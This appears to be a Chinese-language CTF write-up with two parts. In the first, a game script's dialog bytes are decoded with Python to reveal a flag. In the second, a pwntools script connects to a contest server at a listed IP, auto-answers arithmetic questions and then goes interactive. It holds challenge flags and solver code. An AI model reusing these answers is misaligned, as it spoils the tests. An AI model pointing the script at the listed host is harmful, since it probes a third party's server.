main_55@act_dialog^^^main_57@act_se^^^0^^239188159239188159239188159239188154227128142229144172232175180228187150228187172232191152228188154231187143229184184228184190229138158228184128231167141231165158231167152228187170229188143239188140228184128231190164228186186229155180229156168229165182232140182229186151230151129232190185231148168228184141231159165233129147229147170233135140230157165231154132229164167233135143231187143232180185229164167229150157231137185229150157227128130227128143013010035048 main_57@act_se^filename@121117107117109111095048048049051046109112051#vol@056048048^^main_59@act_dialog^^^0^^053055045048 main_59@act_dialog^^^main_61@act_se^^^0^^239188159239188159239188159239188154227128142233130163228184170229165179228186186232191152228188154230139191230137128232176147032102108097103032230157165232175177230131145228189160227128130230136145229183178231187143229129183229129183230139191229136176228186134233130163228184170228184156232165191227128130227128143013010035048 main_61@act_se^filename@121117107117109111095048048049052046109112051#vol@056048048^^main_63@act_dialog^^^0^^054049045048 main_63@act_dialog^^^main_65@act_se^^^0^^239188159239188159239188159239188154227128142230136145232191153229176177230138138229174131229145138232175137228189160239188140229141131228184135228184141232166129231157128228186134229165185231154132233129147239188129227128143013010035048 main_65@act_se^filename@121117107117109111095048048049053046109112051#vol@056048048^^main_66@act_bg^^^0^^054053045048 main_66@act_bg^id@049#filename@099111110118101114049046112110103#x@#y@#opacity@#xscale@#yscale@#ro@045051048^^main_67@act_wait^^^0^^054054045048 main_67@act_wait^time@051048048048^^main_68@act_bg^^^0^^054055045048 main_68@act_bg^id@049#filename@100111111114046106112103#x@#y@#opacity@#xscale@#yscale@#ro@045050053^^main_69@act_cstand^^^0^^054056045048 main_69@act_cstand^id@049#name@083104105110111#face@050#x@049051048#y@049051048#loc@^^main_71@act_dialog^^^0^^054057045048 
main_71@act_dialog^^^main_73@act_deletecstand^^^0^^239188129239188129013010035048 main_73@act_deletecstand^id@048^^main_74@act_se^^^0^^055051045048 main_74@act_se^filename@121117107117109111095048048049054046109112051#vol@056048048^^main_75@act_bg^^^0^^055052045048 main_75@act_bg^id@049#filename@099111110118101114050046112110103#x@#y@#opacity@#xscale@#yscale@#ro@045051048^^main_76@act_wait^^^0^^055053045048 main_76@act_wait^time@051048048048^^main_77@act_se^^^0^^055054045048 main_77@act_se^filename@121117107117109111095048048049055046109112051#vol@056048048^^main_78@act_bg^^^0^^055055045048 main_78@act_bg^id@049#filename@079110108121067078083083046112110103#x@#y@#opacity@#xscale@#yscale@#ro@045051048^^main_79@act_wait^^^0^^055056045048 main_79@act_wait^time@049053048048048^^main_80@act_bg^^^0^^055057045048 main_80@act_bg^id@049#filename@098108097110107046112110103#x@#y@#opacity@#xscale@#yscale@#ro@045051048^^main_81@act_stopbgm^^^0^^056048045048 main_81@act_stopbgm^^^main_82@act_cstand^^^0^^056049045048 main_82@act_cstand^id@048#name@083104105110111#face@051#x@049051048#y@049051048#loc@^^main_83@act_se^^^0^^056050045048 main_83@act_se^filename@121117107117109111095048048049056046109112051#vol@056048048^^main_85@act_dialog^^^0^^056051045048 main_85@act_dialog^^^main_87@act_bg^^^0^^083104105110111058227128142231165158226128148226128148231167152226128148226128148228186186226128148226128148227128143013010035048 main_87@act_bg^id@049#filename@100111111114046106112103#x@#y@#opacity@#xscale@#yscale@#ro@045050053^^main_88@act_bgm^^^0^^056055045048 main_88@act_bgm^filename@050053046109112051#vol@052057056^^main_89@act_deletecstand^^^0^^056056045048 main_89@act_deletecstand^id@048^^main_90@act_cstand^^^0^^056057045048 main_90@act_cstand^id@048#name@067078083083#face@049#x@049051048#y@049051048#loc@^^main_91@act_se^^^0^^057048045048 main_91@act_se^filename@121117107117109111095048048049057046109112051#vol@056048048^^main_93@act_dialog^^^0^^057049045048 
main_93@act_dialog^^^main_95@act_se^^^0^^229143175231136177231154132229165179229173169058227128142228184141229143175228187165229144172228187150231158142232175180229147166227128130227128143013010035048 main_95@act_se^filename@121117107117109111095048048050048046109112051#vol@056048048^^main_97@act_dialog^^^0^^057053045048 main_97@act_dialog^^^main_99@act_se^^^0^^083104105110111058227128142231187191232137178229184189229173144239188140228184128229164180231153189229143145239188140231156139232181183230157165229190136229143175231136177046046046046046033033033033227128143013010035048 main_99@act_se^filename@121117107117109111095048048050049046109112051#vol@056048048^^main_101@act_dialog^^^0^^057057045048 main_101@act_dialog^^^main_103@act_se^^^0^^083104105110111058227128142233154190233129147228189160229176177230152175226128148226128148227128143013010035048 main_103@act_se^filename@121117107117109111095048048050050046109112051#vol@056048048^^main_105@act_dialog^^^0^^049048051045048 main_105@act_dialog^^^main_107@act_se^^^0^^083104105110111058227128142228184150231149140231172172228184128229143175231136177231154132032067078083083032229168152239188129227128143013010035048 main_107@act_se^filename@121117107117109111095048048050052046109112051#vol@056048048^^main_109@act_dialog^^^0^^049048055045048 main_109@act_dialog^^^main_111@act_se^^^0^^229143175231136177231154132229165179229173169058227128142230152175231154132239188140230136145229176177230152175032067078083083032229168152229147166227128130227128143013010035048 main_111@act_se^filename@121117107117109111095048048050053046109112051#vol@056048048^^main_113@act_dialog^^^0^^049049049045048 
main_113@act_dialog^^^main_115@act_se^^^0^^067078083083032229168152058227128142230136145228187172229135157232129154231189145231187156229174137229133168229183165228189156229174164230172162232191142230175143228184128228189141229175185231189145231187156229174137229133168230136150229188128229143145232191144231187180230132159229133180232182163231154132230150176231148159229138155233135143229138160229133165239188129227128143013010035048 main_115@act_se^filename@121117107117109111095048048050054046109112051#vol@056048048^^main_117@act_dialog^^^0^^049049053045048 main_117@act_dialog^^^main_119@act_se^^^0^^067078083083032229168152058227128142229185182228184141230152175228187128228185136229143175230128149231154132233130170230149153231187132231187135229147166239188129227128143013010035048 main_119@act_se^filename@121117107117109111095048048050055046109112051#vol@056048048^^main_121@act_dialog^^^0^^049049057045048 main_121@act_dialog^^^main_123@act_se^^^0^^067078083083032229168152058227128142232175180228186134232191153228185136229164154239188140229133182229174158228189160230160185230156172228184141229156168230132143230136145228187172229134153228186134228187128228185136229137167230156172239188140228189160229133179229191131231154132229143170230156137032102108097103032229175185229144167239188129227128143013010035048 main_123@act_se^filename@121117107117109111095048048050056046109112051#vol@056048048^^main_125@act_dialog^^^0^^049050051045048 main_125@act_dialog^^^main_127@act_se^^^0^^067078083083032229168152058227128142230136145232191153229176177229145138232175137228189160229147166239188129227128143013010035048 main_127@act_se^filename@121117107117109111095048048050057046109112051#vol@056048048^^main_129@act_dialog^^^0^^049050055045048 
main_129@act_dialog^^^main_131@act_deletecstand^^^0^^083104105110111058227128142229165185230173163229156168230130132230130132230139137232191145229146140230136145231154132232183157231166187046046046229165189231180167229188160239188129227128143013010035048 main_131@act_deletecstand^id@048^^main_132@act_picture^^^0^^049051049045048 main_132@act_picture^id@048#filename@067078083083095112110103046112110103#x@053048048#y@051048048#opacity@049#xscale@049046051#yscale@049046051#ro@048^^main_133@act_se^^^0^^049051050045048 main_133@act_se^filename@121117107117109111095048048051048046109112051#vol@056048048^^main_135@act_dialog^^^0^^049051051045048 main_135@act_dialog^^^main_137@act_se^^^0^^083104105110111058227128142230157165229136176229175185232175157230161134229137141233157162228186134239188129227128143013010035048 main_137@act_se^filename@121117107117109111095048048051049046109112051#vol@056048048^^main_139@act_dialog^^^0^^049051055045048 main_139@act_dialog^^^main_142@act_dialog^^^0^^067078083083032229168152058227128142102108097103229176177230152175226128148226128148239188129102108097103230152175099110115115123087048119033089048117095052114101095075049110103095048102095082051086051051115051051095033033033033033033125229147166239188129232174176228189143228186134229144151239188159227128143013010035049 main_142@act_dialog^^^main_144@act_deletepicture^^^0^^067078083083032229168152058227128142229191171229142187230143144228186164229144167239188129227128143013010035048 main_144@act_deletepicture^id@048^^main_145@act_se^^^0^^049052052045048 main_145@act_se^filename@121117107117109111095048048051050046109112051#vol@056048048^^main_147@act_dialog^^^0^^049052053045048 main_147@act_dialog^^^main_150@act_dialog^^^0^^083104105110111058227128142046046046046231173137231173137239188140229165185232175180228186134229149165239188159227128143013010035049 main_150@act_dialog^^^main_152@act_shutdown^^^0^^045045084072069032069078068045045013010035048 
main_152@act_shutdown^^^^^^0^^049053050045048 main_155@act_function^sign@114099108105099107040041^^^main_157@act_endfunction^^1^^049053053045048 main_157@act_endfunction^^^^^^0^^049053055045048
然后去官方的技术文档那搜索了一下
1 符号“@”表示当前行是可执行命令,Action是命令名称,ParameterName是命令参数的名字,ParameterValueExpression是要赋值给等号左侧参数的表达式,省略号表示一个命令既可以没有<参数, 值>对,也可以有多个<参数, 值>对。注意到,一个命令如果带有多个参数时,参数是没有先后顺序要求的;而符号“#”表明当前行是注释,编译器在做语法分析时将略过它;推导符号Dialog代表在游戏执行过程中要显示的文本,这是AVG游戏使用频率最高的命令,由于文本的显示存在跨行的情况,因此它以一种上下文有关文法来表示
Dialog是文本框相关的,然后这些数字也有规律三个一组的像ascii码一样的,然后尝试搜cnss{的ascii码099110115115123搜到了,把后面的字符串拷贝下来然后python三个三个读拿到flag cnss{W0w!Y0u_4re_K1ng_0f_R3V33s33_!!!!!!}
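# Decimal dump of one dialog entry from the decrypted script: every byte of
# the text is written as a zero-padded three-digit number.
s = "099110115115123087048119033089048117095052114101095075049110103095048102095082051086051051115051051095033033033033033033125229147166239188129232174176228189143228186134229144151239188159227128143013010035049"

# Rebuild the raw bytes first and decode them as UTF-8 in one go. Calling
# chr() on each group only works for the ASCII part; the dialog text after the
# flag is multi-byte UTF-8 and would be printed as mojibake.
raw = bytes(int(s[i:i + 3]) for i in range(0, len(s), 3))
decoded = raw.decode("utf-8", errors="replace")
print(decoded, end="")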
pwn 🎮 nc,启动 nc连
😡 让我访问!!! pwntools
from pwn import *
import re

host, port = "43.156.14.141", 1141
p = remote(host, port)

# The service asks two (y/n) questions before the quiz starts; answer "y" to both.
for _ in range(2):
    p.recvuntil(b"(y/n)\n")
    p.sendline(b"y")

# One arithmetic question per line, 100 in total. The pattern also matches
# '*' and '/', but anything other than '+' is answered as a subtraction.
token_re = re.compile(r'(\d+|\+|\-|\*|\/)')
for _ in range(100):
    line = p.recvline().decode('utf-8')
    # exactly three tokens are expected: left operand, operator, right operand
    lhs, op, rhs = token_re.findall(line)
    lhs, rhs = int(lhs), int(rhs)
    answer = lhs + rhs if op == "+" else lhs - rhs
    p.sendline(str(answer).encode('utf-8'))

# Hand the session over to the keyboard: send one typed line, print one reply.
while True:
    p.sendline(input().encode('utf-8'))
    print(p.recvline())
👀 你的名字